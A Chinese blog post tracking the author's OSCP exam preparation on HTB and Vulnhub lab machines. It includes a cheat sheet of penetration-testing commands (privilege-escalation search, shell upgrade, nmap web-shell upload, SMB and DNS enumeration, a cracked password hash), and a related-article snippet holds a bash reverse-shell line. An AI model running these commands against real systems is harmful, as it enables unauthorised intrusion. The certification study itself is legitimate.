oscp学习计划二期

最新推荐文章于 2024-06-16 13:15:43 发布
最新推荐文章于 2024-06-16 13:15:43 发布
阅读量1.2k 收藏 14
点赞数 2
分类专栏: 工具讲解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/105847634
版权

一期

只有一点点基础知识的我
看着Google和vulnhub
一边刷练习
一边看笔记
慢慢也有了自己的知识框架
但是还是感觉准备的不充分

笔记

之前就拿CSDN做笔记了
每篇博客都很少有文字
大多都是我的操作截图
不是特别正规
为了备战
明天开始用官方的报告来写
但是他是五个一组
就是在一个文件中
要对五个靶机进行描述
希望我可以一天打五个靶机吧(现在一天最多3)
报告模板已经给了链接
有需要的可以去下载

靶机

靶机的话
之前一直练的Vulnhub
但是要下载
很费时间也很麻烦
而且网上关于win的靶机推荐
对于Vulnhub很少
目前我就看见了一个scream的
所以明天开始改用HTB
对对对!
还有BOF!!!!
都是我的短板
需要加强练习
希望刷完HTB我可以直接参加考试
附上靶机列表
在这里插入图片描述

总共49个靶机
加上我电脑里还有一个没做的Vulnhub
刚好50个
五个一组
可以刷10次
关于BOF的话
贴个链接
如果有小伙伴有更好的BOF学习链接的话
可以私信交流一哈

25 point buffer overflow machine
25 point behemoth riddled with rabbit holes
2 x 20 point machines
10 point machine

关于考试备考
这有个博客

介绍了几个工具以及考试经过

二期

目标

  1. 在HTB上刷完类似oscp的靶机
  2. 学会BOF
  3. 熟悉对报告的整理
  4. 进一步对渗透技术的熟练,加快打靶机的速度
  5. 对常用命令、工具以及网站进行汇总,以便于在考试的时候节省时间

一些常用命令

find / -user root -perm -4000 -print 2>/dev/null

python3 -c 'import pty;pty.spawn("/bin/bash");'

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.48 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports -sT 10.10.10.48

nmap -p 80 192.168.0.160 -script http-put -script-args http-put.url='/test/shell.php',http-put.file='shell.php'

python -m SimpleHTTPServer 8000

strings -n 20 *.png

for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done

ps -l
ps aux|grep tom

gcc *.c -o exp

uname -a
lsb_release -a

smbmap -H 10.10.10.123
smbclient --list friendzone.htb -U ""
nmap -p 445 --script=smb-enum-shares 10.10.10.123
smbclient -N \\\\10.10.10.123\\Development

host -l friendzone.red 10.10.10.123
dig axfr @10.10.10.123 friendzone.red

$1$sugar$XYG/x4tZyZcCFe2QdDiSa1   qwe123!@#

nc -l -p 8003 > ovrflw              /on your kali
nc -w 5 YourIpAddress 8003 < ovrflw     /on Target

_______________________________________2020.5.2

被网络问题逼疯了
HTB挂vps能连上
但是太太太慢了
决定在vps上安装Kali
在电脑上下了几个vulnhub的靶机
先做着吧

_______________________________________2020.5.19

问题完美解决了 传送门

_______________________________________2020.5.25

hack the box的靶机也刷了一大半了
本想把缓冲区留在最后
做题的时候还是没避开
就提前学了学原理和linux的利用
htb关于linux的靶机还有3个了
我觉得实战对于我来说非常有用
一边学一边练
感觉自己最近学会了很多知识
后天就要进行win的靶机练习了
不知道会怎么样
还有点慌张
希望十天之内也能刷完win的htb靶机
然后再来十天主攻缓冲区
接着就考试
尽量早点考试把
希望在七月一能结束这个证
然后趁着没开学
再考两个证
七月一个八月一个
开学
美滋滋

_______________________________________2020.5.26

今天算是完成了htb和vulnhub的所有linux靶机了
明天开始window靶机
18台+(后面提到的)17台
35台在二号完成
然后报名
七天时间熟练缓冲区和报告
我觉得足够了
六月十号开始正式的oscp实验室练习
希望十五天就能考试
因为我要做的事情太多了
今天就休息一下吧

_______________________________________2020.6.4

到今天为止
表格里的HTB靶机都刷完了
学到了很多
接下来不刷什么了
开始整理一下之前联系过的靶机的知识
收集一下脚本、工具和命令
汇总一下
在一个星期内完成
然后开始oscp的lab练习
如果快的话
希望在15天内考完
如果慢的话
也希望在7.1之前考完
网上说HTB要是oscp的难度的两倍
所以我感觉自己应该能提前通过考试吧
加油

菜浪马废
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
OSCP认证学习资源汇总.zip
08-19
0x0001-OSCP学习资料PWK v1.15-带书签 0x0002-OSCE学习资料-CPTV 1.0 0x0003-OSCP考试命令大全 0x0004-INE机构OSCP课程 0x0005-bof真题文件 0x0006-缓冲区溢出题目全套解决方案 0x0007-OSCP报告模板参考 0x0008-题型...
OSCP证书考试总结与终身学习 - 带你走上 OSCE3
0pr
08-25 1万+
终于有点时间写些东西了。这半年来一直在准备 Offensive Security 的各种考试,内容太多。直到昨天,也就是8月24日,我完成了第二轮 OSEP 的 Lab,心里踏实多了,等着9月4日考试的同时,也想做个小结,谈谈我拿 OSCP 的历程以及今后的目标。希望可以为想考取 OSCP 的同学指明一些道路。
网络安全攻防界的OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS
jennycisp的博客
08-10 2540
关注网络安全攻防领域的筒子们,肯定对OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS不陌生,但是关于他们直减的区别,今儿想做个分享。
一文带你了解OSCP 2024
最新发布
白帽黑客佳哥的博客
06-16 1586
我们先说说,OSCP 是什么?OSCP (Offensive Security Certified Professional)是 Offensive Security (该公司开发和维护着 KALI Linux,以下简称 Offsec)推出的体系非常完善,对于非3年以上渗透工作经验人员来说难度非常高,理论兼实操(更重实操),是业界最知名的渗透测试专业证书。如果大家对网络、主机渗透、红队感兴趣的,这是大家的第一步。考试有三台单独考试靶机和一套域环境(三台机器)三台单独机器,每台20分;
OSCP 2021攻略之旅--从小白到通过
ShadowBlade
08-08 2万+
发布此文章,能够让更多想学习通过OSCP的同学得到更好的指导。
OSCP备考分享
一杯咖啡的渗透记忆
10-10 1510
先说说个人的情况。首先,我并不能算作严格意义上安全科班出身,属于半路出家做安全。一直以来都是从事甲方安全防护,偏重基于业务侧的应用安全、数据保护、隐私合规。渗透测试于我几乎是盲区一样的存在,仅对web、android的安全测试有些许了解,比如漏洞原理、防护、测试等,利用层面都很少接触。​ 起初是从之前的同事那里了解到CEH,一个偏重攻击实操的认证,但是考试需要去香港,觉得比较麻烦就放弃了。之后一段时间也没计划学习渗透的知识,随着工作越来越久,逐渐体会到”不知攻,焉知防“的意思。
OSCP学习笔记总结(本资料禁止转载)
Shadow的博客
10-19 1万+
OSCP学习笔记 第零章实战学习 反弹shell bash -i >&/dev/tcp/192.168.1.1/4444 0>&1 切换交互式shell python -c 'import pty;pty.spawn("/bin/sh")' 查看系统型号:lab_release -a 查看系统版本:uname -a 查看目标主机网页内容:dirb http://192.168.1.1:80 查看网页漏洞:nikto -h 192.168.1.1 --useprox.
OSCP网络安全认证
10-19
**OSCP网络安全认证详解** OSCP(Offensive Security Certified Professional)是网络安全领域内备受推崇的专业认证,由Offensive Security公司颁发。它专为那些希望通过Kali Linux进行渗透测试的网络安全专家设计...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
1-OSCP自学笔记-October靶机练习1
08-04
靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)学习和考试的实践对象。文章分为几个步骤,详细阐述了渗透过程。 1. **靶机搭建**: 首先,你需要从...
OSCP:OSCP考试材料
05-01
【压缩包子文件的文件名称列表】"OSCP-master"可能是一个包含整个OSCP学习路径的资料库,通常这样的资源会包含练习环境配置指南、漏洞分析文档、渗透测试工具介绍、靶机复现教程等。"master"一词可能意味着这是一个...
oscp学习(一)
qq_48514193的博客
02-20 1689
oscp
“突破重围:探索OSCP渗透测试场景中的难题与解决方案“
A485860941的博客
07-17 1101
在OSCP渗透测试认证中,靶场的红队是极具挑战性和实战性的对手,他们不仅拥有深厚的安全知识和技能,还能模拟真实世界中的攻击场景。本文将探索OSCP靶场中超级厉害的红队,介绍他们的攻击策略和技术手段,并分享一些应对策略和解决方案,帮助渗透测试人员更好地应对实际攻击。
废物日记之新版oscp通关历程
m0_53302733的博客
07-27 2505
oscp
OSCP认证考试指南
一杯咖啡的渗透记忆
02-24 6336
简介 第一节: 考试要求 文档要求 Exploit 代码 考试证据 控制面板提交 截图要求 考试限制 Metasploit 限制 第二节:考试信息 考试网络连接 考试控制板 靶机快照恢复 考试中proof文件 分值分配 取消得分 建议使用的报告模板 奖励积分 网络连接问题 联系方式 第三节:提交说明 提交格式和名称 压缩文件 提交上传 收到确认书 其他必要信息 结果 第四节 常见问题
OSCP学习踩过的坑
weixin_70101757的博客
03-03 627
本来想着大约3个半月内就能完成这些,因为我是一名渗透测试人员,我有一定的相关经验,以前我也通过了其他几项认证,可结果告诉我,我错了,太高估自己了。我想的是尽可能多的时间用在实验室里积累动手经验,为考试做准备。因为我评估了自己的优势和劣势,并确定我需要在权限升级方面做得更好(尤其是在Linux中),但我已经做了足够的笔记,观看了足够的视频通过应该没问题!在接下来的8个小时里,我遇到许多问题弄得极度疲惫,结果我睡了一觉,而就这一觉我睡过头了,醒来时只剩下4个半小时,为了通过考试,我匆匆忙忙的开始操作!
OSCP考试指南————考试要求详情
weixin_70101757的博客
05-10 5297
OSCP 认证考试模拟私有 VPN 中的实时网络,其中包含少量易受攻击的机器。 您有 23 小时 45 分钟的时间完成考试。 这意味着如果您的考试在北京标准时间 09:00 开始,您的考试将在第二天北京标准时间 08:45 结束。 考试结束后,您将有另外 24 小时的时间上传您的文件。下面提供了有关如何提交文件的详细信息。 所有 OSCP 考试都有监考。 第 1 部分:考试要求详情 考试包括 3个独立目标和 1个 Active Directory集(2个客户端 + 1个域控制器) 每个目.
oscp认证考试指南
热门推荐
qq_34304107的博客
02-18 2万+
目录简介第一节: 考试要求文档要求Exploit 代码考试证据控制面板提交截图要求考试限制Metasploit 限制第二节:考试信息考试网络连接考试控制板靶机快照恢复考试中proof文件分值分配取消得分建议使用的报告模板奖励积分网络连接问题联系方式提交说明提交格式和名称压缩文件提交上传收到确认书其他必要信息结果常见问题 简介 这份指南以解释oscp认证考试为目的。第一部分描述考试前需要准备的工具等...
OSCP靶机----OnSystemShellDredd
qq_53003652的博客
09-13 204
从WEB到内网&&FTP匿名&&SSH密钥登录&&SUID提权
给几个学习OSCP的网站
03-08
我可以推荐一些学习OSCP的网站,例如:Hack The Box、TryHackMe、VulnHub、OverTheWire、PentesterLab等。这些网站都提供了丰富的渗透测试实验和挑战,可以帮助学习者提高技能水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值